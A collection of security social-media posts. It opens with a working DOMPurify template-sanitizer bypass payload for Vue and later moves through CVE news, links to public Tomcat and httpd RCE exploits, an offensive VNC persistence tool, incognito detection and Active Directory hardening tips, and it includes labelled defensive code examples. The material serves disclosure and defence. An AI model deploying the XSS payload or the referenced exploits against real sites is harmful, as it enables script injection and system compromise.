Inspired by master @kinugawamasato, here's a DOMPurify bypass, found by Codex:
```html
<script src="https://t.co/VyVDO220KQ"></script>
<script src="https://t.co/3brNNLrbBc"></script>
<div id="app"></div>
<script>
var d = '<span>{<foo></foo>{constructor.constructor("alert(1)")()}<foo></foo>}</span>';
document.getElementById('app').appendChild(
DOMPurify.sanitize(d, { SAFE_FOR_TEMPLATES: true, RETURN_DOM: true }));
new Vue({ el: '#app' });
</script>
```
SAFE_FOR_TEMPLATES is a DOMPurify option that strips template syntax like {{...}} so sanitized HTML can't smuggle expressions into a framework like Vue. This bypasses it.
How it works: DOMPurify's job is to delete dangerous code like {{...}} before it reaches Vue. Normally it checks twice, but the RETURN_DOM option skips the second check. So we sneak the payload past the first check by chopping {{...}} into harmless-looking pieces, with junk <foo> tags between them. DOMPurify strips away the junk tags, the pieces fall back together into {{...}}, and Vue runs the code.
Fixed in 3.4.0.
Detailed breakdown: https://t.co/bzYSSy9rBX
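The order-of-operations problem described in the post, modelled as an added example (this is not DOMPurify's code and not the PoC author's): a toy sanitizer over a tiny node tree runs the template-delimiter scrub once before junk elements are removed (the vulnerable order, with no second pass, as when RETURN_DOM skips the string re-check) and once on the final tree after removal. The tag allow-list, the node representation and the benign `{7*7}` stand-in expression are constructed for the example; the defensive point is that the scrub must see the same merged text the framework will see.

```javascript
// Added example, not DOMPurify's own code: a toy sanitizer that models why a
// template-delimiter scrub must run on the FINAL tree, after disallowed
// elements have been removed and the adjacent text nodes have merged.

// Mustache-style delimiters, in the spirit of a SAFE_FOR_TEMPLATES filter.
const TEMPLATE_RE = /\{\{[\s\S]*?\}\}/g;
// Constructed allow-list for the toy sanitizer.
const ALLOWED_TAGS = new Set(["span", "b", "i", "p"]);

const text = (value) => ({ type: "text", value });
const el = (tag, ...children) => ({ type: "element", tag, children });

// Constructed input with the same shape as the payload in the post:
// <span>{<foo></foo>{7*7}<foo></foo>}</span>  ->  "{{7*7}}" once <foo> is gone.
const PAYLOAD = [el("span", text("{"), el("foo"), text("{7*7}"), el("foo"), text("}"))];

// Replace template syntax inside every text node, one node at a time.
function scrubTemplates(nodes) {
  return nodes.map((n) =>
    n.type === "text"
      ? text(n.value.replace(TEMPLATE_RE, " "))
      : el(n.tag, ...scrubTemplates(n.children))
  );
}

// Append a text node, merging with a preceding text node (as a DOM does once
// the element between them is removed).
function pushText(out, value) {
  const last = out[out.length - 1];
  if (last && last.type === "text") last.value += value;
  else out.push(text(value));
}

// Drop elements that are not allow-listed, keep their children (the
// KEEP_CONTENT behaviour), and merge text nodes that become adjacent.
function stripDisallowed(nodes) {
  const out = [];
  for (const n of nodes) {
    if (n.type === "text") {
      pushText(out, n.value);
    } else if (ALLOWED_TAGS.has(n.tag)) {
      out.push(el(n.tag, ...stripDisallowed(n.children)));
    } else {
      for (const c of stripDisallowed(n.children)) {
        if (c.type === "text") pushText(out, c.value);
        else out.push(c);
      }
    }
  }
  return out;
}

function serialize(nodes) {
  return nodes
    .map((n) => (n.type === "text" ? n.value : `<${n.tag}>${serialize(n.children)}</${n.tag}>`))
    .join("");
}

const hasTemplateSyntax = (html) => /\{\{[\s\S]*?\}\}/.test(html);

// Vulnerable order: scrub the text nodes first, then strip junk elements.
// Each "{" sits in its own text node when scrubbed, so nothing matches;
// removing <foo> then glues them into "{{7*7}}" and no later pass sees it.
function sanitizeVulnerable(nodes) {
  return serialize(stripDisallowed(scrubTemplates(nodes)));
}

// Hardened order: strip first, then scrub the merged text of the final tree,
// so the scrub sees exactly the string the template engine will see.
function sanitizeHardened(nodes) {
  return serialize(scrubTemplates(stripDisallowed(nodes)));
}

console.log(sanitizeVulnerable(PAYLOAD)); // <span>{{7*7}}</span>
console.log(sanitizeHardened(PAYLOAD));   // <span> </span>
```

Applied to a real sanitizer, the same lesson is to run the template check on the output you actually hand to the framework: if you ask for a DOM instead of a string, re-check the DOM's text content (or serialize and re-parse) rather than trusting a scrub that ran before node removal.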
Discovered a new method for detecting if someone is using Incognito in Chrome:
Write 512 tiny 1-byte responses into a scratch Cache API cache, then read:
https://t.co/gsVNLl57y6.estimate().usageDetails.caches
Normal Chrome: ~393kb
Incognito: ~85kb
Why? When you're in incognito, Chrome writes to memory instead of disk, which leaves less metadata residue
🚨 A third Linux kernel local-root flaw has been disclosed: Fragnesia. 🚨
Like Copy Fail & Dirty Frag, Fragnesia gives root on all major distributions. Every supported AlmaLinux release is affected.
Help us test the patched kernels: https://t.co/yCiumsl4Nr
NGINX rift: We autonomously discovered this 18-year-old heap overflow (CVE-2026-42945) in @nginx impacting versions 0.6.27 to 1.30.0. If you use the rewrite and set directives, you may be impacted! Please update your NGINX or change the config to mitigate it. Read more at https://t.co/KeoblrGL24
Security things from the last few days:
- CopyFail (linux pwn'd)
- CopyFail 2/Dirty Frag
- 13 advisories in Next.js
- Over 70 CVEs addressed in macOS 26.5
- ~50 CVEs addressed in iOS 26.5
- YellowKey (Windows Bitlocker pwn'd entirely)
- GreenPlasma (Windows privilege escalation)
- CVE-2026-21510 and CVE-2026-21513 confirmed to be used by Russia for Windows RCE
- CVE-2026-32202 separately confirmed to be used by Russia for sensitive document access
- Mini-Shai Hulud (over 300 JS and Python packages compromised via GitHub Action cache poisoning)
- Google confirms they have identified AI-powered exploitation of zero days in an unidentified "open-source, web-based system administration tool"
- Canvas (popular LMS used in most schools) pwn'd entirely
- PAN-OS (palo alto networks) pwn'd with a 9.3 severity CVE-2026-0300
Are you scared yet?
PoCs for Apache Tomcat Unauth RCE (CVE-2026-34486) and Apache httpd Pre-auth RCE (CVE-2026-23918) are now public on our Github.
Tomcat exploit is fully reliable. httpd chain works in a controlled lab setup with a known info leak.
https://t.co/D3dg5iTuwP
https://t.co/2zyr1ds4Mo
‼️🚨 Pwn2Own Berlin 2026 just hit a wall. For the first time in 19 years, ZDI rejected dozens of working zero-day RCE submissions because organizers ran out of contest slots.
Rejected hackers are now going public with PoC demos and direct vendor disclosures, breaking Pwn2Own's usual secrecy.
▪️ AI surfaces a massive wave of 0-day RCEs.
▪️ Submissions overwhelm ZDI past max capacity.
▪️ Slots run out. Researchers with working chains get rejected.
▪️ "Revenge disclosures" begin. ← we are here.
Confirmed casualties so far:
▪️ @xchglabs : 86 vulnerabilities prepared (PyTorch, NVIDIA, Linux KVM, Oracle, Docker, Ollama, Chroma, LiteLLM, llama.cpp). All rejected. Now reporting directly to vendors with writeups dropping as patches land.
▪️ @ggwhyp : full-chain Firefox RCE on Windows. Rejected. Publicly demoed (HTML page → cmd.exe → calc.exe). Responsibly disclosed to Mozilla.
▪️ @yunsu_dev : working RCE chain, rejected. Submitting elsewhere.
▪️ @ryotkak : tried to register for 3+ weeks. ZDI confirmed "at maximum capacity, can't add extra contest days." Considered canceling flight and hotel.
▪️ @anzuukino2802 : Claude Code RCE PoC. Rejected.
▪️ @desckimh : 0-day RCEs in Ollama and LM Studio. Rejected.
Reported impact: a community-estimated 150+ researchers tried to register. Accepted contestants are now being warned about collisions. Rejected vulnerabilities going to bug bounty programs may trigger pre-event patches that invalidate the work of those who got in.
ZDI has not publicly addressed the capacity issue. The event still runs May 14-16 in Berlin.
I was hoping to compete in Pwn2Own with a Firefox full-chain entry, but unfortunately it was rejected. I’ve reported the vulnerability to the Mozilla team.
TailVNC — Drop-in Windows VNC persistence over Tailscale. Single binary, Session 0 bypass, zero exposed ports. Built for offensive security & ops. Inspired by @Yeeb_ 's SockTail.
https://t.co/EaN4DycFi4
#redteam #Pentesting #CyberSecurity
someone built an OPENSOURCE MILITARY RADAR that tracks multiple targets up to 20km away
it's called AERIS-10, full github repo schematics, PCB layouts, FPGA code, python GUI, everything under MIT license
commercial phased array radar starts at $250,000. military surplus is $10,000-50,000 but it's decades-old analog junk with no electronic beam steering
this does electronic beam steering at 10.5GHz, pulse compression, doppler processing, multi-target tracking on a real time map
two versions: 3km range with patch antenna array, 20km range with 32x16 slotted waveguide array and GaN AMPLIFIERS
custom frequency synthesizer, 16 front-end chips, FPGA doing all signal processing, GPS and IMU for ACCURATE target coordinates when the platform moves
all gerber files included so you can order the PCBs and build it yourself
one person built what defense contractors charge a quarter MILLION for and open sourced it
Can LNK files ever be trusted?
⚡ My latest blog post demonstrates several new LNK abuse methods, allowing you to fully spoof the target shown in Explorer. It also introduces tools to create your own LNKs, and to detect spoofed ones yourself.
🐬 https://t.co/VZYVaEfO07
That's a helpful blog post about the React / Next.js vulnerabilities
https://t.co/aCPPRPm8Iw
Contains a react-scanner
https://t.co/OHut2g5MyZ
by @SLCyberSec
Ukrainian EW expert Serhii “Flash” says that this many cables are now required to connect jamming modules to antennas for one effective FPV jammer.
Russian control frequencies cover such a broad range now, and stretching the module frequency range decreases protection.
1/
Google research created a dataset with rainbow tables for NetNTLMv1 with the 1122334455667788 challenge.
https://t.co/fLBxwTIY2H
Dataset is available for download at:
▪️https://t.co/mCt6R7y5Pk [Login required]
▪️gs://net-ntlmv1-tables
The Russians claim to have developed a system of a fiber optic FPV connected to a radio repeater drone.
The two fly together to the maximum range of the repeater, and the fiber FPV then continues on allowing particularly deep strikes.
Review the membership of groups for accounts and groups from another Active Directory forest. These are called "Foreign Security Principals" (FSPs) like the ones highlighted in the image. These FSPs are accounts that exist in another forest but have rights in the AD forest. Any FSPs should be scrutinized and removed if not required.
It's important to review and strictly control these since they may be highly privileged. In this example, compromise of another AD forest (TRDNET) would result in compromise of the current AD forest (https://t.co/zMxawYuyKn).
PowerShell script to scan privileged groups for FSPs:
https://t.co/BZ2RqekLNP
#ActiveDirectorySecurityTip
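A minimal version of the membership review described above, as an added example in JavaScript (it is not the PowerShell script linked in the post and is not attributable to its author): given a dump of privileged-group members with their SIDs, it flags the ones whose domain identifier does not belong to any domain in the forest, and deliberately ignores well-known and BUILTIN SIDs, which also live under the ForeignSecurityPrincipals container but are not accounts from another forest. The forest domain SIDs, the membership rows and the foreign SID are constructed sample values.

```javascript
// Added example, not the post's linked script: classify the members of
// privileged groups by the domain part of their SID so that principals from
// another forest (FSPs) stand out while well-known and in-forest SIDs do not.

// Domain SIDs of the forest being reviewed (constructed sample values).
const FOREST_DOMAIN_SIDS = [
  "S-1-5-21-1000000001-1000000002-1000000003", // constructed: forest root domain
  "S-1-5-21-2000000001-2000000002-2000000003", // constructed: child domain
];

// A domain SID is S-1-5-21-<three subauthorities>; an account SID is that plus
// a RID. Everything else (S-1-1-0, S-1-5-11, S-1-5-32-544, ...) is a
// well-known or BUILTIN SID: not an account from another forest, even though
// some of them are stored as FSP objects in the default container as well.
function sidDomain(sid) {
  const m = /^(S-1-5-21-\d+-\d+-\d+)-\d+$/.exec(sid);
  return m ? m[1] : null;
}

// True when the SID belongs to a domain that is not part of our forest.
function isForeignSid(sid, forestSids = FOREST_DOMAIN_SIDS) {
  const domain = sidDomain(sid);
  return domain !== null && !forestSids.includes(domain);
}

// Constructed membership export, e.g. a "group -> member SID" dump of the
// privileged groups (Domain Admins, Administrators, ...).
const SAMPLE_MEMBERSHIP = [
  { group: "Domain Admins", sid: "S-1-5-21-1000000001-1000000002-1000000003-500", name: "Administrator" },
  { group: "Administrators", sid: "S-1-5-21-2000000001-2000000002-2000000003-1108", name: "CHILD\\svc-backup" },
  { group: "Administrators", sid: "S-1-5-11", name: "Authenticated Users (well-known)" },
  { group: "Administrators", sid: "S-1-5-32-544", name: "BUILTIN\\Administrators (nested)" },
  // Constructed SID whose domain part is outside the forest: an FSP.
  { group: "Administrators", sid: "S-1-5-21-3000000001-3000000002-3000000003-1105", name: "TRDNET\\ops-admin (constructed FSP)" },
];

// Return only the cross-forest members, with the foreign domain SID attached.
function findForeignMembers(rows, forestSids = FOREST_DOMAIN_SIDS) {
  return rows
    .filter((r) => isForeignSid(r.sid, forestSids))
    .map((r) => ({ group: r.group, sid: r.sid, name: r.name, foreignDomain: sidDomain(r.sid) }));
}

// Each finding is a candidate for removal if the cross-forest access is not
// required; a TRDNET-style trust means its compromise reaches these groups.
for (const f of findForeignMembers(SAMPLE_MEMBERSHIP)) {
  console.log(`${f.group}: ${f.name} (${f.sid}) comes from foreign domain ${f.foreignDomain}`);
}
```

In a real review the rows come from a directory query of each privileged group's membership; the SID-domain comparison is what separates a genuine cross-forest principal from the well-known SIDs that appear in the same container.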
🔒 Secure Bits 💡
Did you know you can hide Domain Admins from standard discovery—even from other admins?
Active Directory is a “read-many” directory by design.
But List Object Mode (LOM) can change that.
🕵️♂️ Martin Handl shows how to leverage LOM to make Tier-0 accounts completely invisible to lower-tier admins.
🔧 How it works:
1️⃣ Enable List Object Mode (LOM)
Set dSHeuristics=001 in AD’s Configuration partition. No restart needed—takes effect instantly across the forest.
2️⃣ Use special ACL combinations:
On the parent OU: Deny List contents
On the Tier-0 object itself: Deny List object
Together, this hides the object—even if a user has read access on the directory.
3️⃣ Let AdminSDHolder process do the work:
Apply custom ACLs to the AdminSDHolder container—those propagate automatically to all protected Tier-0 accounts every hour.
Bonus: Martin provides a PowerShell script to apply/revert this across any OU.
👁️ What’s the effect?
From the viewpoint of Tier-1 or Tier-2 users (like helpdesk or server admins), the hidden accounts don’t exist.
No group listing, no LDAP enumeration, no PowerShell output.
📌 Use responsibly:
Hiding is not a replacement for proper security controls (Tiering, Security Baselines, LAPS, Role Separation, ...). But it adds another layer—obscurity that frustrates attackers and tools alike.
📄 Full post + PowerShell script by Martin Handl: https://t.co/w85WaiqYk4
(use auto-translation from German, it is definitely worth it!).
Hiding can also be used by an attacker. Are you sure nothing hides in your Active Directory? How do you search for something like that?
✅ PS: I got you covered, ADProbe can discover hidden accounts...
#ActiveDirectory #CyberSecurity #WindowsSecurity #RedTeam #LOM #ListObjectMode #T0 IQunit IT GmbH Martin Handl @BlueTeamDave
🔥 Microsoft patched a perfect 10.0 CVE in Entra ID (ex-Azure AD) that let attackers impersonate any user, even Global Admins—across every tenant worldwide.
🔑 MFA? Conditional Access? Logging? All bypassed. Total tenant takeover—SharePoint, Exchange, Azure resources.
Details here → https://t.co/HZkO0ItrxK